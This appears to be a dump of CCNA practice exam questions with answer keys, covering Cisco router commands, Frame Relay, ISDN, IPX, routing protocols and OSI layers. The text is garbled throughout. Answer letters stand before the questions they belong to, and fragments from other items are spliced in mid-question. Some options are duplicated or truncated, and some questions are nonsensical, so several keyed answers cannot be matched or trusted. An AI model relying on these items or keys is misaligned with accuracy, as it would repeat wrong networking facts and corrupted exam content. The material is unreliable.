is the default encapsulation type for Frame Relay on a Cisco router? 
^A: HDLC ^B: PPP ^C: IETF ^D: Cisco ^E: ANSI C #CCNA Q. 110 What is the most common Layer 2 device? ^A: Hub ^B: Router ^C: Switch ^D: Repeater D #CCNA Q. 165 What is the most common mail to device? ^A: Hub ^B: Router ^C: Repeater ^D: Switch B #CCNA Q. 305 Which device can be used to segment broadcast domains? ^A: hub ^B: router ^C: bridge ^D: repeater C,D,E #CCNA Q. 239 Which devices can be used to segment a network? (Choose three) ^A: hub ^B: repeater ^C: switch ^D: bridge ^E: router ^F: media converter C #CCNA Q. 216 Which type of LAN segmentation device enables high-speed data exchange? ^A: Hub ^B: Bridge ^C: Switch ^D: Repeater A #CCNA Q. 288 A user issues the command ping 204.211.38.52. Which of the following physical is used to test physical connectivity between the two devices? ^A: ICMP echo request ^B: Information request ^C: timestamp reply ^D: redirect ^E: source quench C,E,F #CCNA Q. 244 Which of the following are options for Frame Relay lmi types? (Choose three) ^A: IETF ^B: Q931 ^C: Q933A ^D: IEEE ^E: CISCO ^F: ANSI B,C #CCNA Q. 253 Which of the following statements describe the codes displayed in the show ip route command? (Choose two.) ^A: I-Indicates a route was learned through an Internal protocol. ^B: S-Indicates a route was learned through static command. ^C: R-Indicates a route was learned through RIP ^D: .S-Indicates a route was learned through a serial port. ^E: R-Indicates a route was learned through a reliable port. the testing application. A #CCNA Q. 211 What is the result of using hierarchical addressing framework? ^A: Increase availability of addresses. ^B: Decrease distance between routers. ^C: Increase router memory requirements. ^D: No need to maintain routing information. B #CCNA Q. 55 What must you do to test connectivity on a dial-on-demand routing (DDR) link? ^A: Increase the idle timeout parameter. ^B: Send interesting traffic across the link. ^C: Reboot one of the Integrated Services Digital Network (ISDN) routers. 
^D: Reset the DDR Integrated Services Digital Network (ISDN) router statistics to zero. B,C,E #CCNA Q. 21 What are the effects of sustained, heavy collisions in CSMA/CD LANs? (Choose three) ^A: Increased broadcast traffic ^B: Delay ^C: Low throughput ^D: High throughput ^E: Congestion ^F: Higher bandwidth B #CCNA Q. 286 What must you do to test connectivity on a dial on demand routing (DDR) link? ^A: Increate the idle import parameter ^B: Send interesting traffic across the link ^C: Switch ^D: Repeater B #CCNA Q. 287 You got a new testing application on a new server in your office. This testing application work with a few hosts. The new server and hosts work with 10 Mbps and make a bandwidth problem for all the rest nontesting hosts. The rest of the hosts in your office network with 2 Mbps. What is the most economical decision would you implement for resolving this problem? ^A: Install new 100 Mbps switches, and change all host's NIC to 100 Mbps. ^B: Segment network with router, and place all testing hosts and the new server into a separate subnet (network). ^C: Add a Bridge and separate the two networks A #CCNA Q. 282 What output interface status would you see if peer interface (on second end of link) is administratively down? ^A: interface is down, line protocol is down ^B: interface is down, line protocol is up ^C: interface is up, line protocol is down ^D: interface is up, line protocol is up A #CCNA Q. 91 Which command specifies a second subinterface on serial interface zero? ^A: interface s 0.2 point - to point ^B: interface 2 s 0 point to point ^C: sub interface 2 s 0 point to point ^D: interface 0 sub 2 point to point ^E: interface s 0.1 point to point sub 2 C #CCNA Q. 156 What is the connection-oriented protocol in the TCP/IP protocol stack? ^A: IP ^B: UDP ^C: TCP ^D: DNS ^E: OSPF D #CCNA Q. 212 What is the link state routing protocol in the TCP/IP protocol stack? ^A: IP ^B: IS-IS ^C: NLSP ^D: OSPF ^E: RIP ver 2 D #CCNA Q. 
148 Which encapsulation methods are most commonly used with dialup integrated services Digital Network (ISDN)? ^A: IP and IPX ^B: IP and PPP ^C: PPP and SDLC ^D: PPP and HDLC B,D #CCNA Q. 93 Which two statements accurately define IP addressing rules? (Choose Two) ^A: IP multicast addresses start with 240 ^B: A host portion of all 1's indicates a network broadcast ^C: The value of zero (0) in the host portion means "all hosts" on the network ^D: IP addresses are four octets long and contain a network portion and a host portion A,C,E #CCNA Q. 82 Which three statements about common elements of the TCP/IP protocol stack are true? (Choose three) ^A: IP provides connection less service and routing capabilities. ^B: ARP enables devices to locate the IP address of local devices. ^C: UDP provides simple connection less service without windowing or acknowledgements. ^D: ICMP provides connection oriented management data to routers and layer three switches. ^E: TCP enables devices to send large quantities of data using switching in a connection-oriented manner. A #CCNA Q. 206 What is the protocol and what is the second part of the following network address? 255255255255 ^A: IP, a flooded broadcast ^B: IP, a directed broadcast ^C: IPX, a flooded broadcast ^D: IPX, a remote directed broadcast C #CCNA Q. 161 When you configure an IP address on a Cisco Router, which command starts the IP processing on the interface? ^A: IP-Space enable ^B: Network IP-Address ^C: IP address IP-address subnet mask. ^D: The exit command from the enable configuration ^E: Copy running-configuration to startup-configuration C #CCNA Q. 291 Given an IPX network with redundant paths, what command will configure load balancing? ^A: ipx load-balance ^B: ip maximum-paths 2 ^C: ip maximum-paths 2 ^D: ipx load-share C #CCNA Q. 283 What is the protocol and what is the second part of the following network address? (Choose all that apply.) 
172.161.0.254 mask 255.255.0.0 ^A: IPX MAX address ^B: IP Class C director broadcast ^C: Private IP address node number ^D: Public IP address directed broadcast ^E: Private IP address directed broadcast C #CCNA Q. 70 What is the protocol and what is the second part of the following network addresses 172.16.0.254, mask=255.255.0.0? ^A: IPX:MAC addresses. ^B: IP:classC directed broadcast. ^C: Private IP address:node number ^D: Public IP addresses:directed broadcast. ^E: Private IP addresses directed broadcast. A #CCNA Q. 310 Which of the following WAN services use two data link layer encapsulations, one for data and one for signaling? ^A: ISDN ^B: Frame Relay ^C: ATM ^D: FDDI B #CCNA Q. 4 Which IOS command is used to associate an ISDN phone number with the next hop router address? ^A: isdn destination number ^B: dialer map ^C: isdn spid1 ^D: isdn line number ^D: That a bridge be placed between the enterprise server and all other users with the exception of B,C #CCNA Q. 119 Which two statements about integrated services digital network (ISDN) are true? (Choose two) ^A: ISDN provides only data only capability. ^B: ISDN provides an integrated voice/data capability. ^C: The ISDN standards define the hardware and call setup schemes for end-to-end digital connectivity. ^D: Users receive more bandwidth on WANs with a leased line of 56kbps than with multiple b channels. A #CCNA Q. 22 Modem networks are often described as using 100Base-TX components. What is meant by the term 'Base' in this definition? ^A: It describes the signaling method for communication on the network. ^B: It refers to the type of media used in the network. ^C: It relates to the speed of transmission of network signals. ^D: It defines the allowable length of media that can be used. ^E: It defines half-duplex or full-duplex operation. C,D #CCNA Q. 54 What are two characteristics of the RARP protocol? (Choose two.) ^A: It generates parameter problem messages. ^B: It maps IP addresses to Ethernet addresses. 
^C: It maps Ethernet addresses to IP addresses. ^D: It is implemented directly on top of the data link layer. A #CCNA Q. 52 What is a benefit of a virtual LAN (VLAN)? ^A: It increases the number of broadcast domains. ^B: It decreases the number of broadcast domains. ^C: It increases the number of collision domains. ^D: It decreases the number of collision domains. ^E: Since it is a virtual interface, it never shuts down. A #CCNA Q. 14 What is the result of segmenting a network with a bridge? ^A: It increases the number of collision domains. ^B: It decreases the number of collision domains. ^C: It increases the number of broadcast domains. ^D: It decreases the number of broadcast domains. D #CCNA Q. 75 What is the result of segmenting a network with a router into segments 1 and 2? ^A: It increases the number of collisions. ^B: It decreases the number of broadcast domains. ^C: It connects segment one's broadcast to segment two. ^D: It prevents segment one's broadcast from getting to segment two. B,E #CCNA Q. 192 Assuming no subnetting, which two pieces of information can be derived from the IP address 144.132.25.10? (Choose Two) ^A: It is a Class C address ^B: It is a Class B address ^C: The network address is 144.0.0.0 ^D: The network address is 144.132.25.0 ^E: The host portion of the address is 25.10 A #CCNA Q. 164 Which statement about the data-link connection identifier (DLCI) is true? ^A: It is a number that identifies a local virtual circuit in Frame Relay network. ^B: It is a signaling standard between the CPE device and the Frame Relay switch. ^C: It is check speed port speed of the connection (local loop) to the Frame Relay cloud. ^D: It is maximum number of uncommitted bits that the Frame Relay switch will attempt to transfer beyond the committed information rate (CIR). A #CCNA Q. 47 Which of the following are not true of standard half-duplex Ethernet circuitry? ^A: It is alternate one-way communication. 
^B: The receive (RX) is wired directly to the transmit (TX) of the remote station. ^C: The receive (TX) is wired directly to the receive (RX) of the remote station. ^D: Collisions are not possible. ^E: Both stations can transmit simultaneously. C #CCNA Q. 126 What is a backoff on an 802.3 network? ^A: It is latency in store and forward switching. ^B: It is the time used for token passing for machine to machine. ^C: It is the retransmission delay that is reinforced when a collision occurs. ^D: It is the result of two nodes transmitting at a same time the frames from each transmitting device collide and are damaged. C #CCNA Q. 189 What is back off on an 802.3 network? ^A: It is latency stored and forward switching. ^B: It is the time used to token passing from machine to machine. ^C: It is re transmission delay that is encountered when a collision occurs. ^D: It the result of two nodes transmitting at the same time the frames from each transmitting device collide and are damaged. D #CCNA Q. 138 What are the characteristics of UDP? ^A: It is reliable and acknowledged ^B: It is unreliable and acknowledged ^C: It is reliable and unacknowledged ^D: It is unreliable and unacknowledged A #CCNA Q. 72 Which statement about the Committed Information Rate (CIR) is true? ^A: It is the rate, in bits per second, at which the Frame Relay switch agrees to transfer data ^B: It is the clock speed (port speed) of the connection (local loop) to the Frame Relay cloud ^C: It is the maximum number of bits that the switch can transfer during any Committed Rate Measurement Interval ^D: It is a signaling standard between the CPE device and the FR switch. It is responsible for managing the connection and maintaining status between the devices. D,F #CCNA Q. 62 Which two statements about IP RIP are true? (Choose two.) ^A: It limits hop counts to 31. ^B: It is a link-state routing protocol. ^C: It uses autonomous system numbers. ^D: It is capable of load sharing over multiple paths. 
^E: It uses bandwidth as the metric for path selection. ^F: It broadcasts updates every 30 seconds by defaults B #CCNA Q. 63 How does inter-VLAN communication take place? ^A: It takes place through any Cisco router. ^B: It takes place through a Cisco router that can run ISL. ^C: It takes place through a router, but this disables all the router's Security and filtering functionality for the VLANs. ^D: For nonroutable protocols, (e.g., NetBEUI) the router provides communications between VLAN domains. ^E: Inter-VLAN communications is not possible because each VLAN is a separate broadcast domain. B #CCNA Q. 81 Using the TCP/IP suite a message is sent from host A to a destination IP address on the same LAN. How does host A determine the destination's MAC address? ^A: It uses a Proxy ARP. ^B: It uses ARP requests. ^C: It uses RARP requests. ^D: It uses router look up table. A,B,C,G #CCNA Q. 74 What are four function/characteristics of the network layer of the OSI model? (Choose four) ^A: It uses a two-part address. ^B: It maintains routing tables. ^C: It uses broadcast addresses. ^D: It establishes network addresses. ^E: It provides access to the LAN media. ^F: It provides media independence for upper layers. ^G: It provides path selection for Internet work communication. B,C #CCNA Q. 233 Which two statements about the store and forward switching method are true? (Choose two) ^A: Latency remains constant regardless of frame size. ^B: Latency through the switch varies with frame length. ^C: The switch receives the complete frame before beginning to forward it. ^D: The switch checks the destination address as soon as it receives the header and begins forwarding the frame immediately. E #CCNA Q. 183 Which command assigns the login password Cisco on the console terminal line? ^A: line vty 0 Log in Password Cisco ^B: Line console Login Password Cisco ^C: Line login terminal Password Cisco ^D: Line console 0 D,E #CCNA Q. 
261 Which of the following are used to prevent routing loops in network that use distance vector routing protocols? (Choose two.) ^A: link-state advertisement (ISA ^B: Spanning Tree Protocol ^C: shortest path first tree ^D: split horizon ^E: hold-down timers A,B,E #CCNA Q. 76 Which three basic switch functions increase available bandwidth on the network? (Choose three) ^A: Loop avoidance. ^B: Address learning ^C: Hop count limiting ^D: Broadcast filtering ^E: Packet forward/filtering. A,B #CCNA Q. 139 What are the two sublayers of the data link layer? (Choose two) ^A: MAC ^B: LLC ^C: SAP ^D: LCP ^E: NetWare Core Protocol (NCP) A #CCNA Q. 199 You telnet to a host on a remote network. Which MAC address will be present in the ARP table when you issue the show arp command? ^A: MAC address of the destination host Ethernet port. ^B: MAC address of the local router Ethernet port ^C: MAC address of the destination router Serial port ^D: MAC address of the local router Serial Port A,C,D #CCNA Q. 242 Which of the following should be done prior to backing up an IOS image to a network server? (Choose three) ^A: Make sure that the network server can be accessed. ^B: Check that the authentication for access is set. ^C: Assure that the network server adequate space for the code image. ^D: Verify any file naming and path requirements. ^E: Make sure that the server can load and run the bootstrap code. B,C #CCNA Q. 285 Which of the following metrics does IGRP use by default to determine the best path to destination? (Choose two.) ^A: Maximum Transmission Unit ^B: Cumulative Interface delay. ^C: Path bandwidth value. ^D: Reliability from source to destination. ^E: Link loading in bits-per-second. ^F: Hold-down timers for updates. A,B,E #CCNA Q. 10 Which devices operate at all seven layers of the OSI model? (Choose three) ^A: Network host ^B: Network management station ^C: Transceiver ^D: Bridge ^E: Web server ^F: Switch A,C #CCNA Q. 
135 Which are two ways IPX supports multiple logical networks on an individual interface? (Choose two) ^A: Network number ^B: Routing protocol ^C: Encapsulation type ^D: Autonomous system number C #CCNA Q. 118 What are two components of an IPX address? ^A: Network number; IP address. ^B: MAC address; node number. ^C: Network number; MAC address. ^D: Network number; subnet number. A,C #CCNA Q. 324 Which of the following are generally considered to be characteristics of connectionless network services? (Choose two.) ^A: non-reliable ^B: reliable ^C: less bandwidth-intensive ^D: handshaking B,D #CCNA Q. 246 In contrast to connectionless services, which of the following are generally regarded as characteristics of connection-oriented network services? (Choose two.) ^A: non-reliable ^B: reliable ^C: less bandwidth-intensive ^D: handshaking A,B #CCNA Q. 263 Which of the following need to be modified in the password recovery process? (Choose two.) ^A: nvram ^B: configuration register ^C: boot flash ^D: cmos ^E: flash C #CCNA Q. 87 How many collisions are caused by transmitting and receiving frames simultaneously in a full-duplex Ethernet Technology? ^A: One ^B: Two ^C: None ^D: Several C #CCNA Q. 316 Based on the debug output shown, what type of handshake occurred for PPP authentication? ^A: one-way ^B: two-way ^C: three-way ^D: no handshake required during authentication. A #CCNA Q. 231 What is a disadvantage of using a connection-oriented protocol such as TCP? ^A: Packet acknowledgement may add overhead ^B: Packets are not tagged with sequence numbers ^C: Loss or duplication of data packets is more likely to occur ^D: The application layer must assume responsibility for correct sequencing of the data packets. C #CCNA Q. 116 What is an advantage of using a connectionless protocol such as UDP? ^A: Packet acknowledgement may reduce overhead traffic. ^B: Loss or duplication of data packets is less likely to occur. 
^C: Packets are not acknowledged which reduces overhead traffic. ^D: The application relies on the transport layer for sequencing of the data packets. C #CCNA Q. 53 IP RIP routing is configured on a router, but all interfaces attach to RIP network. What should you use to prevent all RIP routing updates from being sent through selected interfaces without using access lists? ^A: Passive route ^B: Default routes ^C: Passive interface ^D: Route update filtering B #CCNA Q. 45 Which of the following commands applies to an access control list to a router interface? ^A: permit access-list 101 out ^B: ip access-groups 101 out ^C: apply access-list 101 out ^D: access-class 101 out ^E: ip access-list e0 out A #CCNA Q. 241 What is the effect of the following access list condition? access.list 101 permit ip 10.25.30.0 0.0.0.255 any ^A: Permit all packets matching the first three octets of the source address to all destinations. ^B: Permit all packets matching the last of the destination address and accept all source address. ^C: Permit all packets from the third subnet of the network address to all destinations. ^D: Permit all packets matching the host bits in the source address to all destinations. ^E: Permit all packets to destination matching the first three octets in the destination address. F #CCNA Q. 12 At which OSI layer does data translation and code formatting occur? ^A: Physical ^B: Data link ^C: Network ^D: Transport ^E: Session ^F: Presentation A #CCNA Q. 318 Which command sends and receives ICMP echo messages to verify connectivity from host to host? ^A: ping ^B: tracert ^C: netstat ^D: show cdp neighbors details ^E: show ip route ^F: traceroute A,D,F #CCNA Q. 20 Which commands could be used at the command line interface to troubleshoot LAN connectivity problems on a router? (Choose three) ^A: ping ^B: tracert ^C: ipconfig ^D: show ip route ^E: winipcfg B,C #CCNA Q. 295 Which of the following are application layer protocols? (Choose two.) 
^A: Ping ^B: Telnet ^C: FTP ^D: TCP ^E: IP A,B #CCNA Q. 26 Which two commands allow you to verify address configuration in your internetwork? ^A: Ping ^B: Trace ^C: Verify ^D: Test IP ^E: Echo IP ^F: Config IP A,D #CCNA Q. 84 Which two protocol tools use ICMP? (Choose two) ^A: Ping ^B: Telnet ^C: Configure ^D: Trace route ^E: Show commands ^F: Standard access list D #CCNA Q. 307 You are unable to telnet to a router at address 203.125.12.1 from a workstation with the IP address of 203.125.12.23. You suspect that there is a problem with your protocol stack. Which of the following actions is most likely to confirm your diagnosis? ^A: ping 127.0.0.0 ^B: ping 203.125.12.1 ^C: telnet 127.0.0.1 ^D: ping 127.0.0.1 ^E: tracert 203.125.12.1 A,B #CCNA Q. 266 What do you use for loop avoidance? (Choose two.) ^A: Poison reverse. ^B: Split horizon. ^C: Link state protocol. A,D #CCNA Q. 143 Which two WAN data link layer protocols support multiple upper layer protocols? (Choose Two) ^A: PPP ^B: LAPD ^C: ISDN ^D: HDLC C #CCNA Q. 147 Which statement about the Point-to-Point protocol (PPP) is true? ^A: PPP supports TCP/IP, but not Novell IPX ^B: PPP is being phased out of existence by the Serial Line Internet protocol ^C: PPP provides router-to-router and host-to-network connections over both synchronous and asynchronous circuits. ^D: PPP is an ITU-T and ANSI standard that defines the process for sending data over a packet-switched data network C,D,E #CCNA Q. 151 What are three benefits of integrated services digital network (ISDN)? (Choose three) ^A: PVCs are faster and more reliable. ^B: No specialized equipment is required. ^C: Data transfer is faster than typical modems. ^D: Call setup is faster than with standard telephone service. ^E: It carries many types of data traffic such as voice, video, and data. D #CCNA Q. 298 Which type of router memory normally stores the start-up configuration? ^A: RAM ^B: ROM ^C: FLASH ^D: NVRAM A #CCNA Q. 
303 What function does the up arrow key provide within the Cisco router IOS? ^A: Recalls the previous command line. ^B: Moves the cursor one line ip. ^C: Redisplays the current command line. ^D: Capitalize the command line. A,C #CCNA Q. 223 Which two statements about a reliable connection oriented data transfer are true? (Choose two) ^A: Recipients acknowledge receipt of data. ^B: When buffers are filled to capacity, datagrams are discarded and not re transmitted. ^C: Windows are used to control the amount in outstanding acknowledged data segments. ^D: If the segments timer expires between receipt of an acknowledgement the sender drops the connection. ^E: The receiving device waits for acknowledgements from the sending device before accepting more data segments. A,B,F #CCNA Q. 293 Which of the following are associated with the Presentation Layer of the OSI model? (Choose three) ^A: Rich Text Format (RTF) ^B: Quick Time movie ^C: FTP ^D: TFTP ^E: SMTP ^F: MIDI Password CISCO ^E: Line console 0 Login Password Cisco C #CCNA Q. 38 Which of the following protocols utilizes features of both distance-vector and link-state routing? ^A: RIP ^B: OSPF ^C: EIGRP ^D: IGRP B #CCNA Q. 176 Which router component stores routing tables, ARP cache, and packet buffers? ^A: ROM ^B: RAM ^C: NVRAM ^D: Flash memory A #CCNA Q. 162 When you issue the command show version, your router returns: -Configuration register is 0x0101- From where does the router boot? ^A: ROM ^B: NVRAM ^C: FLASH ^D: A TFTP server E #CCNA Q. 109 Which line from a show spantree 1 command output indicates that virtual LAN1 (VLAN1) is functioning properly? ^A: Root port is fast Ethernet 0/26 ^B: Port Ethernet 0/1 of VLAN is forwarding ^C: Designated port is Ethernet 0/1, path cost 10 ^D: Designated root has priority 0 address 00D0.588F.B600 ^E: VLAN is executing the IEEE compatible spanning tree protocol. B #CCNA Q. 80 What is a function of a reliable transport layer connections. 
^A: Route selection ^B: Acknowledgement ^C: Session checkpoints ^D: System authentication E,F,G #CCNA Q. 207 Which three protocols exactly match their transport layer functions? (Choose three) ^A: Route selection-IP ^B: Sliding window-UDP ^C: Well known ports-IP ^D: Route validation-ICMP ^E: Connection oriented-TCP/IP ^F: Three way handshake TCP/IP ^G: No acknowledgement-UDP A #CCNA Q. 89 Which commands should you use to enable IGRP routing? ^A: router igrp 100 network 192.168.1.0 network 10.0.0.0 ^B: router igrp 100 network 192.168.1.0 network 10.2.0.0 ^C: router igrp 100 network 192.168.1.0 192.168.1.1 network 10.2.0.0 10.2.1.1 D #CCNA Q. 301 Rachel is adding a balanced hybrid routing protocol to her network. Which of the following commands would she use to start the routing process? ^A: router rip ^B: router igrp 100 ^C: router ospf 1 ^D: router eigrp 100 B #CCNA Q. 227 Which command would you use to enable IP RIP version 1 on a router? ^A: Router RIP network 172.16.1.0 network 10.1.0.1 ^B: Router RIP network 172.16.0.0 network 10.0.0.0 ^C: Router RIP network 172.16.1.0 172.16.1.1 network 10.1.0.0 10.1.1.1 D #CCNA Q. 120 Which prompt and command combination sets RIP as the routing protocol? ^A: Router# rip. ^B: Router rip. ^C: Router (Config)# rip. ^D: Router (Config)# router rip. C #CCNA Q. 98 Which router command allows you to view the entire contents of all access lists? ^A: Router# show interface ^B: Router> show IP interface ^C: Router# show access-list ^D: Router> show all access list A #CCNA Q. 97 Which router command allows you to determine if an IP access list is enabled on a particular interface? ^A: Router# show ip interface ^B: Router> show access-list ^C: Router# show ip access-list ^D: Router> show interface ip access-list B #CCNA Q. 65 Which configuration mode and command combination sets the bandwidth metric of a Frame Relay connection? 
^A: router(Config)# clock rate 56 ^B: router(Config-if)# bandwidth 56 ^C: router(Config)# bandwidth 56000 ^D: router(Config-if)# clock rate 56000 C #CCNA Q. 202 Which command sets IGRP as the routing protocol for autonomous system 100? ^A: Router(config)# igrp 100 ^B: Router(config)# network 100 ^C: Router(config)# router igrp 100 ^D: Router(config)# enable igrp 100 ^E: Access List 101 deny IP 128.12.22.55 TCP EQ 20 21 23 A #CCNA Q. 289 How do you change the Console password to "cisco"? ^A: Router(config)# line con 0 Router(config-line)# login Router(config-line)# password cisco ^B: Router(config)# line con 0 Router(config-line)# login Router(config-line)# password Cisco D #CCNA Q. 144 Which command enables directly connected network 199.55.72.0 to be used by RIP? ^A: Router(Config)# rip 199.55.0.0 ^B: Router(Config-router)# rip 199.55.72.0 ^C: Router(Config-router)# network 199.55.0.0 ^D: Router(Config-router)# network 199.55.72.0 C #CCNA Q. 312 Which command correctly configures an IP address on a Cisco router interface? ^A: router(config-if)# ip address 172.18.32.1 subnet mask 255.255.252.0 ^B: router(config-if)# 172.18.32.1 255.255.252.0 ^C: router(config-if)# ip address 172.18.32.1 255.255.252.0 ^D: router(config-if)# 255.255.252.0 subnet mask 255.255.252.0 ^E: router(config-if)# ip address 172.18.32.1/22 ^F: router(config-if)# ip address 172.18.32.1 subnet mask /22 B #CCNA Q. 85 Which command successfully ping an individual IP address? ^A: Router>ping 192.5.5.0 ^B: Router# ping 192.5.5.30 ^C: Router> ping 192.5.5.256 ^D: Router# ping 192.5.5.255 Answer: B D #CCNA Q. 170 Which encapsulation type should be used for the e1 port of Router R3? ^A: SAP ^B: HDLC ^C: ARPA ^D: Novell-Ether B #CCNA Q. 111 Which encapsulation type should be used for the S0 port of Router R2? ^A: SAP ^B: HDLC ^C: ARP ^D: NOVELLETHER B #CCNA Q. 169 Which encapsulation type should be used for the S0 port of router R2? ^A: SAP ^B: HDLC ^C: ARPA ^D: Novel Ether D #CCNA Q. 
60 Which show interface serial 1 status statement indicates that the shutdown command was issued on that interface? ^A: Serial 1 is up, line protocol is up. ^B: Serial 1 is up, line protocol is down. ^C: Serial 1 is down, line protocol is down. ^D: Serial 1 is administratively down, the line protocol is down. C #CCNA Q. 302 Which command must be entered when connecting two routers without external DCE devices via a serial linl? ^A: serial up ^B: line protocol up ^C: clock rate ^D: dce rate ^E: dte rate B #CCNA Q. 133 At which layer of the OSI model does the ping command operate? ^A: Session ^B: Network ^C: Transport ^D: Maintenance network 172.16.1.0 265.255.255.0 Network 10.1.0.0 255.255.0.0 B #CCNA Q. 104 If you are in IOS user mode which command do you use to enter the privileged mode? ^A: Set ^B: Enable ^C: Configure ^D: Privileges A #CCNA Q. 127 You have just issued an erase startup-config command and reloaded your router. In which mode will your router be when you reboot? your router be when you reboot? ^A: Setup. ^B: Startup. ^C: User EXE^C: ^D: User privilege^D: ^E: Global configuration. A,D #CCNA Q. 23 Which of the following are unique characteristics of half-duplex Ethernet as compared to full-duplex Ethernet? (Choose two.) ^A: Shared collision domain. ^B: Private collision domain ^C: Higher effective throughput ^D: Lower effective throughput ^E: Private broadcast domain C #CCNA Q. 44 Which command is used to display the placement and direction of an IP access control list on a router? ^A: show access-list ^B: show ip route ^C: show ip interface ^D: show interface ^E: show interface list A #CCNA Q. 191 Which command displays access list 111? ^A: Show access-list 111 ^B: Show IP access list 111 ^C: Display IP address list 111 ^D: Display access-list 111 details D #CCNA Q. 167 Which ex command displays system configuration information, software version and the names and sources of configuration files and boot images on a router? 
^A: show boot ^B: show flash ^C: show Config ^D: show version B #CCNA Q. 159 Which command displays the interfaces using a given access list? ^A: Show filters ^B: Show IP interface ^C: Show active list ^D: Show interface parameters ^E: Configure IP access list ^F: Show access-list interfaces Login B,C #CCNA Q. 146 Which two commands show your access lists? (Choose two) ^A: Show filters. ^B: Show access-lists ^C: Show IP access-list ^D: Show running-Config E #CCNA Q. 137 In Cisco IOS software, which command displays the backup configuration? ^A: show flash ^B: show version ^C: show tftp-config ^D: show backup-config ^E: show startup-config B,D #CCNA Q. 269 Which commands will allow you to identify the local dlci number? (Choose two.) ^A: show frame-relay local-dlci ^B: show frame-relay pvc ^C: show frame-relay dlci ^D: show frame-relay map ^E: show ip route A #CCNA Q. 132 Which command displays the IP addresses assigned to specific host names? ^A: show hosts ^B: show interface ^C: ping host name ^D: config host name ^E: show host mapping ^F: show host name IP address ^G: trace IP addresses host name A #CCNA Q. 160 You have a Frame Relay Link on serial1. Which command displays the Local Management Interface (LMI), data link connection identifier (DLCI), and bandwidth for that link? ^A: show interface serial1 ^B: show frame-relay serial1 ^C: show protocol frame-relay serial1 ^D: show serial1 encapsulation frame-relay B #CCNA Q. 129 Which command verifies encapsulation as well as layer 1 and layer 2 statistics on a router configured for Frame Relay? ^A: show IP ^B: show interface ^C: show statistics ^D: show frame-relay C #CCNA Q. 43 Which command will provide you with information regarding the Layer 3 configuration of directly connected router interfaces? ^A: show ip interface ^B: show cdb neighbors ^C: show cdp neighbors detail ^D: show ip route ^E: show ip link status B,C #CCNA Q. 
150 Your network is having IP problems connecting to one or more Frame Relay peer routers. Which two commands should you use to show the routers that are reachable? (Choose two) ^A: show IP map ^B: show IP route ^C: show frame-relay map ^D: debug frame-relay map C #CCNA Q. 300 Which commands displays RIP routing updates as they are sent and received by the router? ^A: show ip protocols ^B: show ip route rip ^C: debug ip rip ^D: debug ip updates ^E: debug ip transactions B #CCNA Q. 88 Which Cisco IOS command should you use to display the Novel IPX address assignments on a router? ^A: Show IPX addresses. ^B: Show IPX interface. ^C: IPX network ^D: Display IPX addresses ^E: Show IPX routing details E #CCNA Q. 90 Which show command should you use to view Frame Relay local management interface (LMI) traffic statistics? ^A: show lmi ^B: show ip route ^C: show interface ^D: show statistics ^E: show frame-relay lmi D #CCNA Q. 28 Which command displays all routed protocols and the interfaces on which the protocol is enabled? ^A: show protocols ^B: show protocol brief ^C: show interfaces protocol ^D: show interfaces ^E: show routed ^F: show routed interfaces D #CCNA Q. 2 Which command displays the configuration register setting? ^A: show register ^B: show flash ^C: show boot this IOS command displays the settings of the boot environment variables ^D: show version A #CCNA Q. 214 What is an advantage of local area network LAN segmentation? ^A: Smaller collision domains. ^B: Elimination of broadcast. ^C: Decrease cost of implementation. ^D: Larger number of users within the same domain. A,D #CCNA Q. 67 In order to enable RIP which two tasks need to be performed? (Choose two) ^A: Specify the routing protocol. ^B: Configure static Rip routes. ^C: Specify directly connected subnets. ^D: Specify directly connected networks. A,B #CCNA Q. 177 Which two solutions are used to reduce the chance of distance vector routing loops. 
(Choose two) ^A: Split horizon ^B: Route Poison ^C: Area Hierarchies ^D: Link State Algorithms A,C #CCNA Q. 140 Which two types of route table entries does a Layer3 router to determine the appropriate path to a destination use? (Choose two) ^A: Static route entry ^B: Default route entry ^C: Dynamic route entry ^D: Temporary route entry ^E: Permanent route entry A #CCNA Q. 260 What type of switching create variable latency through the switch? ^A: Store-and-forward ^B: Cut-through ^C: Fragment-free B #CCNA Q. 256 In what switch mode read first part of frame with destination address and send frame immediately? ^A: Store-and-forward ^B: Cut-through ^C: Fragment-free C #CCNA Q. 11 With the hierarchical numbering of IP addresses what determines the portion of the address that will identify the network number? ^A: Subnet Mask ^B: Dots between octets ^C: Class of first octet ^D: Assignments of DHCP ^E: Address Resolution Protocol A,B,E #CCNA Q. 276 Which connection allows the use of full-duplex Ethernet? (Choose three) ^A: Switch to host. ^B: Switch to switch. ^C: Hub to hu^B: ^D: Switch to hu^B: ^E: To host. A,B #CCNA Q. 236 Full Duplex Ethernet can operate between which of the following devices? (Choose two.) ^A: Switch to host. ^B: Switch to switch. ^C: Hub to hu^B: ^D: Switch to hu^B: ^E: Hub to host. B,D,F #CCNA Q. 17 Which of the following statements are true regarding bridges and switches? (Choose three) ^A: Switches are primarily software based while bridges are hardware base^D: ^B: Both bridges and switches forward Layer 2 broadcasts. ^C: Bridges are frequently faster than switches. ^D: Switches have a higher number of ports than most bridges. ^E: Bridges define broadcast domains while switches define collision domains. ^F: Both bridges and switches make forwarding decisions based on Layer 2 addresses. B #CCNA Q. 218 Which statement about switched and routed data flow is correct? ^A: Switches create a single collision domain and a single broadcast domain. 
Routers provide separate broadcast domains. ^B: Switches create separate collision domains but a single broadcast domain. Routers provide a separate broadcast domains. ^C: Switches create a single collision domain and a separate broadcast domain. Router provides a separate broadcast domain as well. ^D: Switches create separate collision domains and separate broadcast domains. Routers provide separate collision domains. D #CCNA Q. 172 Which statement about Ethernet switches is true? ^A: Symmetric switching allows connection between ports of unlike bandwidth and does not require memory bufferin^G: ^B: Memory buffering is used to prevent a bottleneck when ports of different bandwidth are connected on a symmetric switch. ^C: The latency can be reduced if the switch utilizes the store and forward method of switchin^G: Store and forward is better for error detection. ^D: The cut-trough method of switching is faster because the switch forwards the packet to the destination as soon as it reads the destination address. D #CCNA Q. 201 Which statement about the flow control function of TCP is True? ^A: TCP makes no effort to check for lost or duplicate data packets. ^B: The application layer must sequence data packets when using TCP. ^C: TCP controls the flow of UDP data through negative acknowledgements NAK. ^D: TCP is a connection-oriented protocol that acknowledges receipt of data packets and is considered reliable B #CCNA Q. 99 Which statement about Ethernet networks is true? ^A: The advantage of a full duplex is the ability to transmit data over Mbase2 cable. ^B: Full duplex Ethernet requires a point-to-point connection when only two nodes are present. ^C: Ethernet switches can use full duplex mode to connect multiple nodes to a single port of a switch. ^D: Half duplex is a cut through packet processing method that is very fast with little error correction, full duplex is store and forward method that is slower but has better error correction. A #CCNA Q. 
